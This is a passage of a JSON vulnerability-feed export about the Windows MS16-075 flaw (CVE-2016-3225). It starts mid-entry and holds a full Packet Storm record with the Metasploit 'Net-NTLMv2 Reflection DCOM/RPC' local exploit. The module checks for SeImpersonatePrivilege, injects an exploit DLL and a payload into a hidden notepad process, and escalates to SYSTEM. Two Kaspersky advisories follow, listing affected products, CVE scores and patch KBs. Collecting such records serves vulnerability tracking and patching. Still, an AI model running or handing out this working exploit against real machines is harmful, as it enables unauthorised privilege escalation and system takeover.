successful exploitation. \nprint_status('Configuration injected. Executing exploit...') \nprocess.thread.create(exploit_mem + offset, payload_mem) \nprint_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/151182/ms16_075_reflection_juicy.rb.txt"}, {"lastseen": "2018-10-06T10:13:05", "description": "", "published": "2018-10-05T00:00:00", "type": "packetstorm", "title": "Windows Net-NTLMv2 Reflection DCOM/RPC", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4113", "CVE-2016-3225"], "modified": "2018-10-05T00:00:00", "id": "PACKETSTORM:149689", "href": "https://packetstormsecurity.com/files/149689/Windows-Net-NTLMv2-Reflection-DCOM-RPC.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core/post/windows/reflective_dll_injection' \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = NormalRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::Process \ninclude Msf::Post::Windows::FileInfo \ninclude Msf::Post::Windows::ReflectiveDLLInjection \n \ndef initialize(info={}) \nsuper(update_info(info, { \n'Name' => 'Windows Net-NTLMv2 Reflection DCOM/RPC', \n'Description' => %q( \nModule utilizes the Net-NTLMv2 reflection between DCOM/RPC \nto achieve a SYSTEM handle for elevation of privilege. Currently the module \ndoes not spawn as SYSTEM, however once achieving a shell, one can easily \nuse incognito to impersonate the token. \n), \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'FoxGloveSec', # the original Potato exploit \n'breenmachine', # Rotten Potato NG! \n'Mumbai' # Austin : port of RottenPotato for reflection & quick module \n], \n'Arch' => [ARCH_X86, ARCH_X64], \n'Platform' => 'win', \n'SessionTypes' => ['meterpreter'], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'none', \n'WfsDelay' => '20' \n}, \n'Targets' => \n[ \n['Automatic', {}], \n['Windows x86', { 'Arch' => ARCH_X86 }], \n['Windows x64', { 'Arch' => ARCH_X64 }] \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'References' => \n[ \n['MSB', 'MS16-075'], \n['CVE', '2016-3225'], \n['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'], \n['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'], \n['URL', 'https://github.com/breenmachine/RottenPotatoNG'] \n], \n'DisclosureDate' => 'Jan 16 2016', \n'DefaultTarget' => 0 \n})) \nend \n \ndef assign_target \nif target.name == 'Automatic' \ncase sysinfo[\"Architecture\"] \nwhen 'x86' \nvprint_status(\"Found we are on an x86 target\") \nmy_target = targets[1] \nwhen 'x64' \nvprint_status(\"Found we are on an x64 target\") \nmy_target = targets[2] \nelse \nfail_with(Failure::NoTarget, \"Unable to determine target\") \nend \nelse \nmy_target = target \nend \nreturn my_target \nend \n \ndef verify_arch(my_target) \nif my_target[\"Arch\"] != sysinfo[\"Architecture\"] \nprint_error(\"Assigned Target Arch = #{my_target.opts['Arch']}\") \nprint_error(\"Actual Target Arch = #{sysinfo['Architecture']}\") \nfail_with(Failure::BadConfig, \"Assigned Arch does not match reality\") \nend \nif client.arch != sysinfo[\"Architecture\"] \nfail_with(Failure::BadConfig, \"Session/Target Arch mismatch; WOW64 not supported\") \nelse \nvprint_good(\"Current payload and target Arch match....\") \nend \nend \n \ndef check \nprivs = client.sys.config.getprivs \nif privs.include?('SeImpersonatePrivilege') \nreturn Exploit::CheckCode::Appears \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nif is_system? \nfail_with(Failure::None, 'Session is already elevated') \nend \nmy_target = assign_target \nprint_status(\"#{my_target['Arch']}\") \nverify_arch(my_target) \nif check == Exploit::CheckCode::Safe \nfail_with(Failure::NoAccess, 'User does not have SeImpersonate Privilege') \nend \nif my_target.opts['Arch'] == 'x64' \ndll_file_name = 'rottenpotato.x64.dll' \nvprint_status(\"Assigning payload rottenpotato.x64.dll\") \nelsif my_target.opts['Arch'] == 'x86' \ndll_file_name = 'rottenpotato.x86.dll' \nvprint_status(\"Assigning payload rottenpotato.x86.dll\") \nelse \nfail_with(Failure::BadConfig, \"Unknown target arch; unable to assign exploit code\") \nend \nprint_status('Launching notepad to host the exploit...') \nnotepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true) \nbegin \nprocess = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) \nprint_good(\"Process #{process.pid} launched.\") \nrescue Rex::Post::Meterpreter::RequestError \nprint_error('Operation failed. Trying to elevate the current process...') \nprocess = client.sys.process.open \nend \nprint_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\") \nlibrary_path = ::File.join(Msf::Config.data_directory, \"exploits\", \"rottenpotato\", dll_file_name) \nlibrary_path = ::File.expand_path(library_path) \nprint_status(\"Injecting exploit into #{process.pid}...\") \nexploit_mem, offset = inject_dll_into_process(process, library_path) \nprint_status(\"Exploit injected. Injecting payload into #{process.pid}...\") \npayload_mem = inject_into_process(process, payload.encoded) \n# invoke the exploit, passing in the address of the payload that \n# we want invoked on successful exploitation. \nprint_status('Payload injected. Executing exploit...') \nprocess.thread.create(exploit_mem + offset, payload_mem) \nprint_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/149689/ms16_075_reflection.rb.txt"}], "kaspersky": [{"lastseen": "2020-09-02T11:57:44", "bulletinFamily": "info", "cvelist": ["CVE-2016-3218", "CVE-2016-3211", "CVE-2016-3220", "CVE-2016-3212", "CVE-2016-3213", "CVE-2016-3207", "CVE-2016-3221", "CVE-2016-3299", "CVE-2016-3228", "CVE-2016-0199", "CVE-2016-3206", "CVE-2016-3205", "CVE-2016-3225", "CVE-2016-0200", "CVE-2016-3236", "CVE-2016-3216", "CVE-2016-3223"], "description": "### *Detect date*:\n06/14/2016\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, obtain sensitive information, perform cross-site scripting attack.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nVBScript 5.7 \nWindows Vista x64 Edition Service Pack 2 \nInternet Explorer 9 \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows 8.1 for x64-based systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2012 \nWindows Vista Service Pack 2 \nInternet Explorer 11 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows RT 8.1 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nVBScript 5.8 \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nInternet Explorer 10 \nWindows Server 2012 R2\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2016-3213](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3213>) \n[CVE-2016-3216](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3216>) \n[CVE-2016-3228](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3228>) \n[CVE-2016-0200](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-0200>) \n[CVE-2016-3225](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3225>) \n[CVE-2016-3223](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3223>) \n[CVE-2016-3221](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3221>) \n[CVE-2016-3220](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3220>) \n[CVE-2016-3212](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3212>) \n[CVE-2016-0199](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-0199>) \n[CVE-2016-3211](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3211>) \n[CVE-2016-3205](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3205>) \n[CVE-2016-3236](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3236>) \n[CVE-2016-3207](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3207>) \n[CVE-2016-3206](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3206>) \n[CVE-2016-3299](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3299>) \n[CVE-2016-3218](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3218>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2016-3207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3207>)0.0Unknown \n[CVE-2016-3206](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3206>)0.0Unknown \n[CVE-2016-3205](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3205>)0.0Unknown \n[CVE-2016-3213](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3213>)0.0Unknown \n[CVE-2016-3212](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3212>)0.0Unknown \n[CVE-2016-3211](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3211>)0.0Unknown \n[CVE-2016-0199](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0199>)0.0Unknown \n[CVE-2016-0200](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0200>)0.0Unknown \n[CVE-2016-3220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3220>)0.0Unknown \n[CVE-2016-3218](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3218>)0.0Unknown \n[CVE-2016-3216](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3216>)0.0Unknown \n[CVE-2016-3299](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3299>)0.0Unknown \n[CVE-2016-3236](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3236>)0.0Unknown \n[CVE-2016-3228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3228>)0.0Unknown \n[CVE-2016-3225](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3225>)0.0Unknown \n[CVE-2016-3223](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3223>)0.0Unknown \n[CVE-2016-3221](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3221>)0.0Unknown\n\n### *KB list*:\n[3161561](<http://support.microsoft.com/kb/3161561>) \n[3159398](<http://support.microsoft.com/kb/3159398>) \n[3161949](<http://support.microsoft.com/kb/3161949>) \n[3161664](<http://support.microsoft.com/kb/3161664>) \n[3164033](<http://support.microsoft.com/kb/3164033>) \n[3164035](<http://support.microsoft.com/kb/3164035>) \n[3160005](<http://support.microsoft.com/kb/3160005>)\n\n### *Microsoft official advisories*:", "edition": 1, "modified": "2020-07-22T00:00:00", "published": "2016-06-14T00:00:00", "id": "KLA11911", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11911", "title": "\r KLA11911Multiple vulnerabilites in Microsoft Products (ESU) ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:48:08", "bulletinFamily": "info", "cvelist": ["CVE-2016-3218", "CVE-2016-3227", "CVE-2016-3220", "CVE-2016-3215", "CVE-2016-3213", "CVE-2016-3203", "CVE-2016-3221", "CVE-2016-3299", "CVE-2016-3228", "CVE-2016-3219", "CVE-2016-3225", "CVE-2016-3201", "CVE-2016-3236", "CVE-2016-3232", "CVE-2016-3216", "CVE-2016-3231", "CVE-2016-3223"], "description": "### *Detect date*:\n06/14/2016\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Windows. Malicious users can exploit these vulnerabilities to execute arbitrary code, bypass security restrictions, cause denial of service, gain privileges or obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Windows Vista Service Pack 2 \nMicrosoft Windows Server 2008 Service Pack 2 \nMicrosoft Windows 7 Service Pack 1 \nMicrosoft Windows Server 2008 R2 Service Pack 1 \nMicrosoft Windows 8.1 \nMicrosoft Windows Server 2012 \nMicrosoft Windows Server 2012 R2 \nMicrosoft Windows RT 8.1 \nMicrosoft Windows 10 \nMicrosoft Windows 10 Versioin 1511\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2016-3215](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3215>) \n[CVE-2016-3213](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3213>) \n[CVE-2016-3203](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3203>) \n[CVE-2016-3201](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3201>) \n[CVE-2016-3220](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3220>) \n[CVE-2016-3219](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3219>) \n[CVE-2016-3218](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3218>) \n[CVE-2016-3216](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3216>) \n[CVE-2016-3299](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3299>) \n[CVE-2016-3236](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3236>) \n[CVE-2016-3232](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3232>) \n[CVE-2016-3231](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3231>) \n[CVE-2016-3228](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3228>) \n[CVE-2016-3227](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3227>) \n[CVE-2016-3225](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3225>) \n[CVE-2016-3223](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3223>) \n[CVE-2016-3221](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3221>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Vista](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Vista-4/>)\n\n### *CVE-IDS*:\n[CVE-2016-3215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3215>)4.3Warning \n[CVE-2016-3213](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3213>)9.3Critical \n[CVE-2016-3203](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3203>)9.3Critical \n[CVE-2016-3201](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3201>)4.3Warning \n[CVE-2016-3220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3220>)6.9High \n[CVE-2016-3219](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3219>)6.9High \n[CVE-2016-3218](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3218>)6.9High \n[CVE-2016-3216](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3216>)4.3Warning \n[CVE-2016-3299](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3299>)4.3Warning \n[CVE-2016-3236](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3236>)10.0Critical \n[CVE-2016-3232](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3232>)2.1Warning \n[CVE-2016-3231](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3231>)7.2High \n[CVE-2016-3228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3228>)9.0Critical \n[CVE-2016-3227](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3227>)10.0Critical \n[CVE-2016-3225](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3225>)6.9High \n[CVE-2016-3223](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3223>)9.3Critical \n[CVE-2016-3221](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3221>)6.9High\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[3162343](<http://support.microsoft.com/kb/3162343>) \n[3161561](<http://support.microsoft.com/kb/3161561>) \n[3163017](<http://support.microsoft.com/kb/3163017>) \n[3163018](<http://support.microsoft.com/kb/3163018>) \n[3159398](<http://support.microsoft.com/kb/3159398>) \n[3161949](<http://support.microsoft.com/kb/3161949>) \n[3161664](<http://support.microsoft.com/kb/3161664>) \n[3164033](<http://support.microsoft.com/kb/3164033>) \n[3164035](<http://support.microsoft.com/kb/3164035>) \n[3164294](<http://support.microsoft.com/kb/3164294>) \n[3157569](<http://support.microsoft.com/kb/3157569>) \n[3161951](<http://support.microsoft.com/kb/3161951>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 44, "modified": "2020-06-18T00:00:00", "published": "2016-06-14T00:00:00", "id": "KLA10825", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10825", "title": "\r KLA10825Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
